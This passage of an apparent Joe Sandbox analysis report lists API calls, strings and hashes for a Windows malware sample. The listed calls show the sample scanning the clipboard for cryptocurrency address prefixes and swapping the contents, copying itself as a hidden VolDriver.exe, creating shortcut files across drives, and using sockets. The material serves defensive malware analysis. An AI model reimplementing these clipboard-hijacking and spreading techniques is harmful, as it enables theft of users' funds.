                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                                                          • String ID:
                                                                          • API String ID: 3494217179-0
                                                                          • Opcode ID: 221ff9bf4637e0f2fcde085651825014d24c986efab82c4dd12a184a83869ec7
                                                                          • Instruction ID: df671814152bebb26e69c002585293889e867c83d00cbddb1be5e8999c879425
                                                                          • Opcode Fuzzy Hash: 221ff9bf4637e0f2fcde085651825014d24c986efab82c4dd12a184a83869ec7
                                                                          • Instruction Fuzzy Hash: 49111275D00208FFDB10DFA9D845F9E7BB4AF48308F04C169F608AB381E6399A54CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D79D,00000000), ref: 004013D5
                                                                            • Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                            • Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
                                                                            • Part of subcall function 0040B440: EnterCriticalSection.KERNEL32(004176A8,?,?,0040D0F9), ref: 0040B450
                                                                            • Part of subcall function 0040B440: LeaveCriticalSection.KERNEL32(004176A8,?,?,0040D0F9), ref: 0040B47C
                                                                          • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040D7BD
                                                                          • WaitForSingleObject.KERNEL32(0000061C,00001388), ref: 0040D807
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                                                          • String ID:
                                                                          • API String ID: 3920643007-0
                                                                          • Opcode ID: 84fb30d8ac40b996f337d270279570023f86994429b4a296eac51e0e31cf65db
                                                                          • Instruction ID: d43f0fe25c3251aeb4024b5a44130fee1f3604a21426a3a303ccaeae81292ff9
                                                                          • Opcode Fuzzy Hash: 84fb30d8ac40b996f337d270279570023f86994429b4a296eac51e0e31cf65db
                                                                          • Instruction Fuzzy Hash: 4111A175E00208ABE704EBE4DC46FAE7775AB44704F10807AE601772D2E679AE50CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • gethostname.WS2_32(?,00000100), ref: 0040B02C
                                                                          • gethostbyname.WS2_32(?), ref: 0040B03E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: gethostbynamegethostname
                                                                          • String ID:
                                                                          • API String ID: 3961807697-0
                                                                          • Opcode ID: aaec8b9e3ccfd23335778a95738de583a013869622460b5e30cdc36053fb7845
                                                                          • Instruction ID: 9c091e62e96c824db52d3ded4772c24a160659da8493513af369241dcb3163e3
                                                                          • Opcode Fuzzy Hash: aaec8b9e3ccfd23335778a95738de583a013869622460b5e30cdc36053fb7845
                                                                          • Instruction Fuzzy Hash: 631100349041188BCB24CF14C844BDAB7B1EB65314F14C6DAD49967391C7F96DC5CF89
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: gethostbynameinet_addr
                                                                          • String ID:
                                                                          • API String ID: 1594361348-0
                                                                          • Opcode ID: c33f327bb9ec7267db1a3eace16e79cfc334ac04858cae8989207d18368f1188
                                                                          • Instruction ID: 312701b97bf9dc8992d88ef9bdb8c1d55890938f4ab66c2671a86e13cba3ff2a
                                                                          • Opcode Fuzzy Hash: c33f327bb9ec7267db1a3eace16e79cfc334ac04858cae8989207d18368f1188
                                                                          • Instruction Fuzzy Hash: D5F01C38D00208EFCB00DFB4D44889DBBB4EB48311F2083AAE905673A0D7319E80DB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(0000061C,000003E8), ref: 0040B66E
                                                                          • InterlockedDecrement.KERNEL32(00416068), ref: 0040B680
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DecrementInterlockedObjectSingleWait
                                                                          • String ID:
                                                                          • API String ID: 4086267124-0
                                                                          • Opcode ID: d9631427891ee6aa9ae7329f02fb181f4c0a1243ccccb7a40fb15ef81033e72f
                                                                          • Instruction ID: 813cb8d251f0332b77a609c490e93f9283edb612d06304cc331b5f99f3a273e6
                                                                          • Opcode Fuzzy Hash: d9631427891ee6aa9ae7329f02fb181f4c0a1243ccccb7a40fb15ef81033e72f
                                                                          • Instruction Fuzzy Hash: B5D0A73164030493C74057A5BC49FAA3A5DEB14711F608833F140F11D0C7BDC89086BF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • shutdown.WS2_32(0040AD6D,00000002), ref: 0040AD89
                                                                          • closesocket.WS2_32(0040AD6D), ref: 0040AD93
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: closesocketshutdown
                                                                          • String ID:
                                                                          • API String ID: 572888783-0
                                                                          • Opcode ID: bfbd7c6bd4046a28b837c812f6aa1fd48043d02f9901879055b44668827d2eb5
                                                                          • Instruction ID: 69ce69260fc8840876d91afc79957fad69f2a54b7a8d7d483856da217b0a501e
                                                                          • Opcode Fuzzy Hash: bfbd7c6bd4046a28b837c812f6aa1fd48043d02f9901879055b44668827d2eb5
                                                                          • Instruction Fuzzy Hash: 04C04C7914120CBBCB049FE5ED4DDD97B6CEB4C651F008494FA098B251CBB6E980CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(004176A8,?,?,0040D0F9), ref: 0040B450
                                                                          • LeaveCriticalSection.KERNEL32(004176A8,?,?,0040D0F9), ref: 0040B47C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID:
                                                                          • API String ID: 3168844106-0
                                                                          • Opcode ID: d71b46d2a715c7ae67ca145340e55f7dee3c0646f3594f4dbcbfd189e29d16fc
                                                                          • Instruction ID: ba03583b253ec91699bd5e361358be9260e1d13ac05daae16e4e5e595cf7ad68
                                                                          • Opcode Fuzzy Hash: d71b46d2a715c7ae67ca145340e55f7dee3c0646f3594f4dbcbfd189e29d16fc
                                                                          • Instruction Fuzzy Hash: 6BE04FB4989604EBC705DF8CEC49B997BB4F705324F204179F809533A1D7B9AE50CA5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(004176A8,?,0040B637), ref: 0040ADA8
                                                                          • LeaveCriticalSection.KERNEL32(004176A8,?,0040B637), ref: 0040ADB8
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID:
                                                                          • API String ID: 3168844106-0
                                                                          • Opcode ID: a62c6441e8ce307879afa927716fec91506432b2dfe47bc4b8af2369b723e83a
                                                                          • Instruction ID: 716e569b0d3b626b873371b16fee73ea372d9d3996ce4e23563d04fcf61f0ac1
                                                                          • Opcode Fuzzy Hash: a62c6441e8ce307879afa927716fec91506432b2dfe47bc4b8af2369b723e83a
                                                                          • Instruction Fuzzy Hash: 97B092301D971AB7C10637AEAC0AAC83A28A990B26B604032B04D504A5CEEEA4A0496E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0040B440: EnterCriticalSection.KERNEL32(004176A8,?,?,0040D0F9), ref: 0040B450
                                                                            • Part of subcall function 0040B440: LeaveCriticalSection.KERNEL32(004176A8,?,?,0040D0F9), ref: 0040B47C
                                                                          • WaitForSingleObject.KERNEL32(0000061C,00001388), ref: 0040D11C
                                                                            • Part of subcall function 0040CD10: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CD1C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                                                          • String ID:
                                                                          • API String ID: 3309573332-0
                                                                          • Opcode ID: 262f0a1188c4c0cab9bb7d2480aa1ff1c397132662bf8e40164d60a473f31973
                                                                          • Instruction ID: ce7864885f3d84405b0061ad2a7a6bd3390cc58ec662b4736d5f806c99c86722
                                                                          • Opcode Fuzzy Hash: 262f0a1188c4c0cab9bb7d2480aa1ff1c397132662bf8e40164d60a473f31973
                                                                          • Instruction Fuzzy Hash: 25E09271D00308A6D714A7A19806B9F766A9B54305F24887AFA007A2C2DE7A9E9493AD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 004062C0: GetDriveTypeW.KERNELBASE(0040629F), ref: 004062CD
                                                                          • lstrcpyW.KERNEL32(?,?), ref: 004062B3
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DriveTypelstrcpy
                                                                          • String ID:
                                                                          • API String ID: 3664088370-0
                                                                          • Opcode ID: aa744ef504167f27be6d486533275d748dec175d232d96b41b3e61fed09f16a0
                                                                          • Instruction ID: a3f39d1a22dcf836f44b0fbcddd46cfc88cbb50e51ff9e9dfde0dd7881e74902
                                                                          • Opcode Fuzzy Hash: aa744ef504167f27be6d486533275d748dec175d232d96b41b3e61fed09f16a0
                                                                          • Instruction Fuzzy Hash: DCF04975D00208EBCB00EFA4D44579EB7B4EF04304F00C0ADE815AB240E639AB58CB49
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • _chkstk.NTDLL(?,00406CA0,?,?,?), ref: 00406658
                                                                          • wsprintfW.USER32 ref: 0040668F
                                                                          • wsprintfW.USER32 ref: 004066AF
                                                                          • wsprintfW.USER32 ref: 004066CF
                                                                          • wsprintfW.USER32 ref: 004066EF
                                                                          • wsprintfW.USER32 ref: 00406708
                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                                                          • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040675E
                                                                          • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                                                          • PathFileExistsW.SHLWAPI(?), ref: 0040677C
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0040678F
                                                                          • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067A2
                                                                          • PathFileExistsW.SHLWAPI(?), ref: 004067AF
                                                                          • CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\135143440.exe,?,00000000), ref: 004067C7
                                                                          • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067DA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                          • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$C:\Users\user\AppData\Local\Temp\135143440.exe$shell32.dll$shell32.dll
                                                                          • API String ID: 3833403615-2373606944
                                                                          • Opcode ID: 51569e4564f7ad71e9d56f202160bdb96e67f6a8183d4c5cf6e4c163dce801ad
                                                                          • Instruction ID: e2ecd58a7cdb3ddabc66963e241761916e5e8b01b4df26f84105cefa3cc8d735
                                                                          • Opcode Fuzzy Hash: 51569e4564f7ad71e9d56f202160bdb96e67f6a8183d4c5cf6e4c163dce801ad
                                                                          • Instruction Fuzzy Hash: 33D17475900258ABCB20DF60DD44FEA77B8BB48704F00C5E9F20AA6191D7B99BD4CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(00000000), ref: 004048BC
                                                                          • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404C72
                                                                          • StrStrW.SHLWAPI(00000000,cosmos), ref: 00404C9D
                                                                          • StrStrW.SHLWAPI(00000000,addr), ref: 00404CC8
                                                                          • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D67
                                                                          • StrStrW.SHLWAPI(00000000,ronin:), ref: 00404D7E
                                                                          • StrStrW.SHLWAPI(00000000,nano_), ref: 00404D95
                                                                          • isalpha.NTDLL ref: 00404E14
                                                                          • isdigit.NTDLL ref: 00404E2B
                                                                          • StrStrW.SHLWAPI(00000000,bnb), ref: 0040530C
                                                                          • StrStrW.SHLWAPI(00000000,band), ref: 00405326
                                                                          • StrStrW.SHLWAPI(00000000,bc1), ref: 00405340
                                                                          • StrStrW.SHLWAPI(00000000,ronin:), ref: 0040535A
                                                                          • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00405374
                                                                          • StrStrW.SHLWAPI(00000000,cosmos), ref: 0040538E
                                                                          • StrStrW.SHLWAPI(00000000,addr), ref: 004053A8
                                                                          • StrStrW.SHLWAPI(00000000,nano_), ref: 004053C2
                                                                          • lstrlenA.KERNEL32(00000000), ref: 00405483
                                                                          • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 0040549E
                                                                          • GlobalLock.KERNEL32(00000000), ref: 004054B1
                                                                          • memcpy.NTDLL(00000000,00000000,-00000001), ref: 004054CF
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004054DB
                                                                          • OpenClipboard.USER32(00000000), ref: 004054E3
                                                                          • EmptyClipboard.USER32 ref: 004054ED
                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004054F9
                                                                          • CloseClipboard.USER32 ref: 004054FF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
                                                                          • String ID: 0$addr$addr$band$bc1$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$hA$nano_$nano_$ronin:$ronin:
                                                                          • API String ID: 2780752356-1454159098
                                                                          • Opcode ID: 77815f1f35a1cc3ce37f81e42cca13de53b9b454e4023a23e876cae76c16c78e
                                                                          • Instruction ID: 8b76dbab904426f6344c2213623639f5583a586d6f1bda248701b4bb768ff90c
                                                                          • Opcode Fuzzy Hash: 77815f1f35a1cc3ce37f81e42cca13de53b9b454e4023a23e876cae76c16c78e
                                                                          • Instruction Fuzzy Hash: D58238B0A00218EACF548F41C0945BE7BB2EF82751F60C0ABE9456F294D77D9EC1DB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _allshl_aullshr
                                                                          • String ID: Y
                                                                          • API String ID: 673498613-3233089245
                                                                          • Opcode ID: 2b6c3b75d77b0e24acab98f6bd1a69bf3c8c981e8cdcfd24e3371654e0b37102
                                                                          • Instruction ID: 4d8f306ddd96cdbeec7be06e546bd05c29a7a48ff42b254dd7b8871862d7ca9e
                                                                          • Opcode Fuzzy Hash: 2b6c3b75d77b0e24acab98f6bd1a69bf3c8c981e8cdcfd24e3371654e0b37102
                                                                          • Instruction Fuzzy Hash: 26D22C79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _allshl_aullshr
                                                                          • String ID:
                                                                          • API String ID: 673498613-0
                                                                          • Opcode ID: d93e173d11edabbe82854e57cccec4cdb31f5773cec3a15aa4c8c5b1acdc36b5
                                                                          • Instruction ID: 79e03549b4f3619f9c0a7ca38024119294f73f3101d0de1f55345608e55bd6d2
                                                                          • Opcode Fuzzy Hash: d93e173d11edabbe82854e57cccec4cdb31f5773cec3a15aa4c8c5b1acdc36b5
                                                                          • Instruction Fuzzy Hash: CBD22B79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateDirectoryW.KERNEL32(00406ADB,00000000), ref: 0040651F
                                                                          • wsprintfW.USER32 ref: 00406535
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                                                          • lstrcmpW.KERNEL32(?,00410FEC), ref: 00406571
                                                                          • lstrcmpW.KERNEL32(?,00410FF0), ref: 00406587
                                                                          • wsprintfW.USER32 ref: 004065AA
                                                                          • wsprintfW.USER32 ref: 004065CA
                                                                          • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                                                          • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                                                          • FindClose.KERNEL32(000000FF), ref: 0040662F
                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                          • String ID: %s\%s$%s\%s$%s\*
                                                                          • API String ID: 92872011-445461498
                                                                          • Opcode ID: fff228176ed4e70ddfe54118d53eb9c7a4e211142d687289bb598ae5de3d6162
                                                                          • Instruction ID: 675ada4a5424986e6cd9ec47b4399dcfcf89a647db31862166f89cf1cb76b4cd
                                                                          • Opcode Fuzzy Hash: fff228176ed4e70ddfe54118d53eb9c7a4e211142d687289bb598ae5de3d6162
                                                                          • Instruction Fuzzy Hash: E33178B5900218AFCB10DB60EC89FDA7778AB48301F00C5A9F609A3185DB75DAD9CF68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 0040CF42
                                                                          • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CF68
                                                                          • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CF9F
                                                                          • GetTickCount.KERNEL32 ref: 0040CFB4
                                                                          • Sleep.KERNEL32(00000001), ref: 0040CFD4
                                                                          • GetTickCount.KERNEL32 ref: 0040CFDA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CountTick$Sleepioctlsocketrecv
                                                                          • String ID:
                                                                          • API String ID: 107502007-0
                                                                          • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                          • Instruction ID: 1a678e6439685295adbdd864bb1f175a680e3ab9afc47d2c7bf7927640be176d
                                                                          • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                          • Instruction Fuzzy Hash: B031FE7490020EEFCF04DFA4D988AEE77B1FF44315F108669E815A72D0D7749A90CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
                                                                          • RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8
                                                                          Memory Dump Source
